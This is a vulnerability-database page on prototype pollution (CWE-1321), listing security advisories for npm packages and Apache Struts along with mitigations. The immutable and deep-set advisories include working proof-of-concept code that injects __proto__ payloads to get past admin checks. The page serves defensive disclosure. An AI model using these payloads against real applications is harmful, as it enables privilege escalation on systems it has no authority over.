CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
778 vulnerabilities reference this CWE, most recent first.
GHSA-WC4X-QMR2-RJ8H
Vulnerability from github – Published: 2022-09-21 00:00 – Updated: 2022-09-23 17:08Prototype pollution vulnerability in stealjs steal via the alias variable in babel.js.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "steal"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-37265"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-09-21T21:08:31Z",
"nvd_published_at": "2022-09-20T18:15:00Z",
"severity": "CRITICAL"
},
"details": "Prototype pollution vulnerability in stealjs steal via the alias variable in babel.js.",
"id": "GHSA-wc4x-qmr2-rj8h",
"modified": "2022-09-23T17:08:11Z",
"published": "2022-09-21T00:00:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37265"
},
{
"type": "WEB",
"url": "https://github.com/stealjs/steal/issues/1534"
},
{
"type": "PACKAGE",
"url": "https://github.com/stealjs/steal"
},
{
"type": "WEB",
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4216"
},
{
"type": "WEB",
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L4569"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "steal vulnerable to Prototype Pollution via alias variable"
}
GHSA-WF6X-7X77-MVGW
Vulnerability from github – Published: 2026-03-04 21:28 – Updated: 2026-04-24 20:48Impact
What kind of vulnerability is it? Who is impacted?
A Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.
Affected APIs
| API | Notes |
|---|---|
mergeDeep(target, source) |
Iterates source keys via ObjectSeq, assigns merged[key] |
mergeDeepWith(merger, target, source) |
Same code path |
merge(target, source) |
Shallow variant, same assignment logic |
Map.toJS() |
object[k] = v in toObject() with no __proto__ guard |
Map.toObject() |
Same toObject() implementation |
Map.mergeDeep(source) |
When source is converted to plain object |
Patches
Has the problem been patched? What versions should users upgrade to?
| major version | patched version |
|---|---|
| 3.x | 3.8.3 |
| 4.x | 4.3.7 |
| 5.x | 5.1.5 |
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
- Validate user input
- Node.js flag --disable-proto
- Lock down built-in objects
- Avoid lookups on the prototype
- Create JavaScript objects with null prototype
Proof of Concept
PoC 1 — mergeDeep privilege escalation
"use strict";
const { mergeDeep } = require("immutable"); // v5.1.4
// Simulates: app merges HTTP request body (JSON) into user profile
const userProfile = { id: 1, name: "Alice", role: "user" };
const requestBody = JSON.parse(
'{"name":"Eve","__proto__":{"role":"admin","admin":true}}',
);
const merged = mergeDeep(userProfile, requestBody);
console.log("merged.name:", merged.name); // Eve (updated correctly)
console.log("merged.role:", merged.role); // user (own property wins)
console.log("merged.admin:", merged.admin); // true ← INJECTED via __proto__!
// Common security checks — both bypassed:
const isAdminByFlag = (u) => u.admin === true;
const isAdminByRole = (u) => u.role === "admin";
console.log("isAdminByFlag:", isAdminByFlag(merged)); // true ← BYPASSED!
console.log("isAdminByRole:", isAdminByRole(merged)); // false (own role=user wins)
// Stealthy: Object.keys() hides 'admin'
console.log("Object.keys:", Object.keys(merged)); // ['id', 'name', 'role']
// But property lookup reveals it:
console.log("merged.admin:", merged.admin); // true
PoC 2 — All affected APIs
"use strict";
const { mergeDeep, mergeDeepWith, merge, Map } = require("immutable");
const payload = JSON.parse('{"__proto__":{"admin":true,"role":"superadmin"}}');
// 1. mergeDeep
const r1 = mergeDeep({ user: "alice" }, payload);
console.log("mergeDeep admin:", r1.admin); // true
// 2. mergeDeepWith
const r2 = mergeDeepWith((a, b) => b, { user: "alice" }, payload);
console.log("mergeDeepWith admin:", r2.admin); // true
// 3. merge
const r3 = merge({ user: "alice" }, payload);
console.log("merge admin:", r3.admin); // true
// 4. Map.toJS() with __proto__ key
const m = Map({ user: "alice" }).set("__proto__", { admin: true });
const r4 = m.toJS();
console.log("toJS admin:", r4.admin); // true
// 5. Map.toObject() with __proto__ key
const m2 = Map({ user: "alice" }).set("__proto__", { admin: true });
const r5 = m2.toObject();
console.log("toObject admin:", r5.admin); // true
// 6. Nested path
const nested = JSON.parse('{"profile":{"__proto__":{"admin":true}}}');
const r6 = mergeDeep({ profile: { bio: "Hello" } }, nested);
console.log("nested admin:", r6.profile.admin); // true
// 7. Confirm NOT global
console.log("({}).admin:", {}.admin); // undefined (global safe)
Verified output against immutable@5.1.4:
mergeDeep admin: true
mergeDeepWith admin: true
merge admin: true
toJS admin: true
toObject admin: true
nested admin: true
({}).admin: undefined ← global Object.prototype NOT polluted
References
Are there any links users can visit to find out more?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "immutable"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-rc.1"
},
{
"fixed": "4.3.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "immutable"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.1.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "immutable"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.8.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29063"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-04T21:28:06Z",
"nvd_published_at": "2026-03-06T19:16:21Z",
"severity": "HIGH"
},
"details": "## Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.\n\n## Affected APIs\n\n| API | Notes |\n| --------------------------------------- | ----------------------------------------------------------- |\n| `mergeDeep(target, source)` | Iterates source keys via `ObjectSeq`, assigns `merged[key]` |\n| `mergeDeepWith(merger, target, source)` | Same code path |\n| `merge(target, source)` | Shallow variant, same assignment logic |\n| `Map.toJS()` | `object[k] = v` in `toObject()` with no `__proto__` guard |\n| `Map.toObject()` | Same `toObject()` implementation |\n| `Map.mergeDeep(source)` | When source is converted to plain object |\n\n\n\n## Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n| major version | patched version |\n| --- | --- |\n| 3.x | 3.8.3 |\n| 4.x | 4.3.7 |\n| 5.x | 5.1.5 |\n\n## Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n- [Validate user input](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#validate_user_input)\n- [Node.js flag --disable-proto](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#node.js_flag_--disable-proto)\n- [Lock down built-in objects](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#lock_down_built-in_objects)\n- [Avoid lookups on the prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#avoid_lookups_on_the_prototype)\n- [Create JavaScript objects with null prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#create_javascript_objects_with_null_prototype)\n\n## Proof of Concept\n\n### PoC 1 \u2014 mergeDeep privilege escalation\n\n```javascript\n\"use strict\";\nconst { mergeDeep } = require(\"immutable\"); // v5.1.4\n\n// Simulates: app merges HTTP request body (JSON) into user profile\nconst userProfile = { id: 1, name: \"Alice\", role: \"user\" };\nconst requestBody = JSON.parse(\n \u0027{\"name\":\"Eve\",\"__proto__\":{\"role\":\"admin\",\"admin\":true}}\u0027,\n);\n\nconst merged = mergeDeep(userProfile, requestBody);\n\nconsole.log(\"merged.name:\", merged.name); // Eve (updated correctly)\nconsole.log(\"merged.role:\", merged.role); // user (own property wins)\nconsole.log(\"merged.admin:\", merged.admin); // true \u2190 INJECTED via __proto__!\n\n// Common security checks \u2014 both bypassed:\nconst isAdminByFlag = (u) =\u003e u.admin === true;\nconst isAdminByRole = (u) =\u003e u.role === \"admin\";\nconsole.log(\"isAdminByFlag:\", isAdminByFlag(merged)); // true \u2190 BYPASSED!\nconsole.log(\"isAdminByRole:\", isAdminByRole(merged)); // false (own role=user wins)\n\n// Stealthy: Object.keys() hides \u0027admin\u0027\nconsole.log(\"Object.keys:\", Object.keys(merged)); // [\u0027id\u0027, \u0027name\u0027, \u0027role\u0027]\n// But property lookup reveals it:\nconsole.log(\"merged.admin:\", merged.admin); // true\n```\n\n### PoC 2 \u2014 All affected APIs\n\n```javascript\n\"use strict\";\nconst { mergeDeep, mergeDeepWith, merge, Map } = require(\"immutable\");\n\nconst payload = JSON.parse(\u0027{\"__proto__\":{\"admin\":true,\"role\":\"superadmin\"}}\u0027);\n\n// 1. mergeDeep\nconst r1 = mergeDeep({ user: \"alice\" }, payload);\nconsole.log(\"mergeDeep admin:\", r1.admin); // true\n\n// 2. mergeDeepWith\nconst r2 = mergeDeepWith((a, b) =\u003e b, { user: \"alice\" }, payload);\nconsole.log(\"mergeDeepWith admin:\", r2.admin); // true\n\n// 3. merge\nconst r3 = merge({ user: \"alice\" }, payload);\nconsole.log(\"merge admin:\", r3.admin); // true\n\n// 4. Map.toJS() with __proto__ key\nconst m = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r4 = m.toJS();\nconsole.log(\"toJS admin:\", r4.admin); // true\n\n// 5. Map.toObject() with __proto__ key\nconst m2 = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r5 = m2.toObject();\nconsole.log(\"toObject admin:\", r5.admin); // true\n\n// 6. Nested path\nconst nested = JSON.parse(\u0027{\"profile\":{\"__proto__\":{\"admin\":true}}}\u0027);\nconst r6 = mergeDeep({ profile: { bio: \"Hello\" } }, nested);\nconsole.log(\"nested admin:\", r6.profile.admin); // true\n\n// 7. Confirm NOT global\nconsole.log(\"({}).admin:\", {}.admin); // undefined (global safe)\n```\n\n**Verified output against immutable@5.1.4:**\n\n```\nmergeDeep admin: true\nmergeDeepWith admin: true\nmerge admin: true\ntoJS admin: true\ntoObject admin: true\nnested admin: true\n({}).admin: undefined \u2190 global Object.prototype NOT polluted\n```\n\n\n## References\n_Are there any links users can visit to find out more?_\n\n- [JavaScript prototype pollution](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution)",
"id": "GHSA-wf6x-7x77-mvgw",
"modified": "2026-04-24T20:48:56Z",
"published": "2026-03-04T21:28:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/issues/2178"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/commit/16b3313fdf2c5f579f10799e22869f6909abf945"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/commit/6e2cf1cfe6137e72dfa48fc2cfa8f4d399d113f9"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/commit/6ed4eb626906df788b08019061b292b90bc718cb"
},
{
"type": "PACKAGE",
"url": "https://github.com/immutable-js/immutable-js"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
},
{
"type": "WEB",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Immutable is vulnerable to Prototype Pollution"
}
GHSA-WFWQ-XC57-FQ7V
Vulnerability from github – Published: 2021-05-25 15:59 – Updated: 2023-07-13 17:59eivindfjeldstad-dot below 1.0.3 is vulnerable to Prototype Pollution.The function 'set' could be tricked into adding or modifying properties of 'Object.prototype' using a 'proto' payload.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@eivifj/dot"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7639"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-915"
],
"github_reviewed": true,
"github_reviewed_at": "2022-09-07T23:58:45Z",
"nvd_published_at": "2020-04-06T13:15:00Z",
"severity": "MODERATE"
},
"details": "eivindfjeldstad-dot below 1.0.3 is vulnerable to Prototype Pollution.The function \u0027set\u0027 could be tricked into adding or modifying properties of \u0027Object.prototype\u0027 using a \u0027__proto__\u0027 payload.",
"id": "GHSA-wfwq-xc57-fq7v",
"modified": "2023-07-13T17:59:31Z",
"published": "2021-05-25T15:59:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7639"
},
{
"type": "WEB",
"url": "https://github.com/eivindfjeldstad/dot/commit/774e4b0c97ca35d2ae40df2cd14428d37dd07a0b"
},
{
"type": "PACKAGE",
"url": "https://github.com/eivindfjeldstad/dot"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-EIVIFJDOT-564435"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "eivindfjeldstad-dot contains prototype pollution vulnerability"
}
GHSA-WG6G-PPVX-927H
Vulnerability from github – Published: 2022-01-27 14:27 – Updated: 2022-01-27 14:26The package cached-path-relative before 1.1.0 is vulnerable to Prototype Pollution via the cache variable that is set as {} instead of Object.create(null) in the cachedPathRelative function, which allows access to the parent prototype properties when the object is used to create the cached relative path. When using the origin path as proto, the attribute of the object is accessed instead of a path. Note: This vulnerability derives from an incomplete fix in https://security.snyk.io/vuln/SNYK-JS-CACHEDPATHRELATIVE-72573
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "cached-path-relative"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-23518"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-01-24T23:03:02Z",
"nvd_published_at": "2022-01-21T20:15:00Z",
"severity": "HIGH"
},
"details": "The package cached-path-relative before 1.1.0 is vulnerable to Prototype Pollution via the cache variable that is set as {} instead of Object.create(null) in the cachedPathRelative function, which allows access to the parent prototype properties when the object is used to create the cached relative path. When using the origin path as __proto__, the attribute of the object is accessed instead of a path. **Note:** This vulnerability derives from an incomplete fix in https://security.snyk.io/vuln/SNYK-JS-CACHEDPATHRELATIVE-72573",
"id": "GHSA-wg6g-ppvx-927h",
"modified": "2022-01-27T14:26:40Z",
"published": "2022-01-27T14:27:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23518"
},
{
"type": "WEB",
"url": "https://github.com/ashaffer/cached-path-relative/commit/40c73bf70c58add5aec7d11e4f36b93d144bb760"
},
{
"type": "PACKAGE",
"url": "https://github.com/ashaffer/cached-path-relative"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00006.html"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2348246"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-CACHEDPATHRELATIVE-2342653"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in cached-path-relative"
}
GHSA-WGXM-RG53-H2C6
Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2024-04-22 23:14The NPM module 'deep-set' can be abused by Prototype Pollution vulnerability since the function deepSet() does not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.
PoC
var deepSet = require('deep-set')
var obj = {'1':'2'}
console.log(obj.isAdmin);
deepSet(obj, '__proto__.isAdmin', 'true')
console.log(obj.isAdmin);
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "deep-set"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"last_affected": "1.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-28276"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T23:14:16Z",
"nvd_published_at": "2020-12-29T17:15:00Z",
"severity": "CRITICAL"
},
"details": "The NPM module \u0027deep-set\u0027 can be abused by Prototype Pollution vulnerability since the function `deepSet()` does not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC\n```js\nvar deepSet = require(\u0027deep-set\u0027)\nvar obj = {\u00271\u0027:\u00272\u0027}\nconsole.log(obj.isAdmin);\ndeepSet(obj, \u0027__proto__.isAdmin\u0027, \u0027true\u0027)\nconsole.log(obj.isAdmin);\n```",
"id": "GHSA-wgxm-rg53-h2c6",
"modified": "2024-04-22T23:14:16Z",
"published": "2022-05-24T17:37:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28276"
},
{
"type": "PACKAGE",
"url": "https://github.com/klaemo/deep-set"
},
{
"type": "WEB",
"url": "https://github.com/klaemo/deep-set/blob/103d650b3de1f5c6cf051236347ba59e7274cd07/index.js#L39"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20210320110509/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28276"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution vulnerability in \u0027deep-set\u0027"
}
GHSA-WHPX-G542-7C7V
Vulnerability from github – Published: 2024-07-01 15:32 – Updated: 2024-07-11 17:35harvey-woo cat5th/key-serializer v0.2.5 was discovered to contain a prototype pollution via the function "query". This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@cat5th/key-serializer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.2.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-39018"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-11T17:35:46Z",
"nvd_published_at": "2024-07-01T13:15:05Z",
"severity": "MODERATE"
},
"details": "harvey-woo cat5th/key-serializer v0.2.5 was discovered to contain a prototype pollution via the function \"query\". This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.",
"id": "GHSA-whpx-g542-7c7v",
"modified": "2024-07-11T17:35:46Z",
"published": "2024-07-01T15:32:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39018"
},
{
"type": "WEB",
"url": "https://gist.github.com/mestrtee/be75c60307b2292884cc03cebd361f3f"
},
{
"type": "PACKAGE",
"url": "https://github.com/harvey-woo/key-serializer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "@cat5th/key-serializer Prototype Pollution vulnerability"
}
GHSA-WJC4-73Q6-GV3M
Vulnerability from github – Published: 2024-01-03 06:30 – Updated: 2025-12-26 15:16In Plotly plotly.js before 2.25.2, plot API calls have a risk of proto being polluted in expandObjectPaths or nestedProperty.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "plotly/plotly.js"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.25.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "plotly.js"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.25.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-46308"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-03T19:38:54Z",
"nvd_published_at": "2024-01-03T05:15:11Z",
"severity": "CRITICAL"
},
"details": "In Plotly plotly.js before 2.25.2, plot API calls have a risk of __proto__ being polluted in expandObjectPaths or nestedProperty.",
"id": "GHSA-wjc4-73q6-gv3m",
"modified": "2025-12-26T15:16:48Z",
"published": "2024-01-03T06:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46308"
},
{
"type": "WEB",
"url": "https://github.com/plotly/plotly.R/issues/2463"
},
{
"type": "WEB",
"url": "https://github.com/plotly/plotly.js/commit/02498404c8ad7a3395191e65694fb142a37b0fe9"
},
{
"type": "WEB",
"url": "https://github.com/plotly/plotly.js/commit/5efd2a1f07a418b230a5626fc6c1c7929c47949d"
},
{
"type": "PACKAGE",
"url": "https://github.com/plotly/plotly.js"
},
{
"type": "WEB",
"url": "https://github.com/plotly/plotly.js/releases/tag/v2.25.2"
},
{
"type": "WEB",
"url": "https://plotly.com/javascript"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "plotly.js prototype pollution vulnerability"
}
GHSA-WJPC-CGVW-XX23
Vulnerability from github – Published: 2021-12-16 14:29 – Updated: 2023-09-08 21:04All versions of package sey are vulnerable to Prototype Pollution via the deepmerge() function.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "sey"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-23663"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-12-14T14:35:47Z",
"nvd_published_at": "2021-12-10T20:15:00Z",
"severity": "MODERATE"
},
"details": "All versions of package `sey` are vulnerable to Prototype Pollution via the `deepmerge()` function.",
"id": "GHSA-wjpc-cgvw-xx23",
"modified": "2023-09-08T21:04:57Z",
"published": "2021-12-16T14:29:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23663"
},
{
"type": "PACKAGE",
"url": "https://github.com/eserozvataf/sey"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-SEY-1727592"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in sey"
}
GHSA-WM32-M2H7-232M
Vulnerability from github – Published: 2024-07-01 15:32 – Updated: 2024-07-03 18:47adolph_dudu ratio-swiper v0.0.2 was discovered to contain a prototype pollution via the function parse. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
{
"affected": [],
"aliases": [
"CVE-2024-39000"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-01T13:15:05Z",
"severity": "MODERATE"
},
"details": "adolph_dudu ratio-swiper v0.0.2 was discovered to contain a prototype pollution via the function parse. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.",
"id": "GHSA-wm32-m2h7-232m",
"modified": "2024-07-03T18:47:34Z",
"published": "2024-07-01T15:32:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39000"
},
{
"type": "WEB",
"url": "https://gist.github.com/mestrtee/840f5d160aab4151bd0451cfb822e6b5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WP4H-PVGW-5727
Vulnerability from github – Published: 2021-12-02 14:50 – Updated: 2021-12-02 14:45Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.struts:struts2-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.5.22"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-0230"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-915"
],
"github_reviewed": true,
"github_reviewed_at": "2021-12-02T14:45:03Z",
"nvd_published_at": "2020-09-14T17:15:00Z",
"severity": "CRITICAL"
},
"details": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.",
"id": "GHSA-wp4h-pvgw-5727",
"modified": "2021-12-02T14:45:03Z",
"published": "2021-12-02T14:50:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0230"
},
{
"type": "WEB",
"url": "https://cwiki.apache.org/confluence/display/ww/s2-059"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/struts"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/2982840"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts"
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.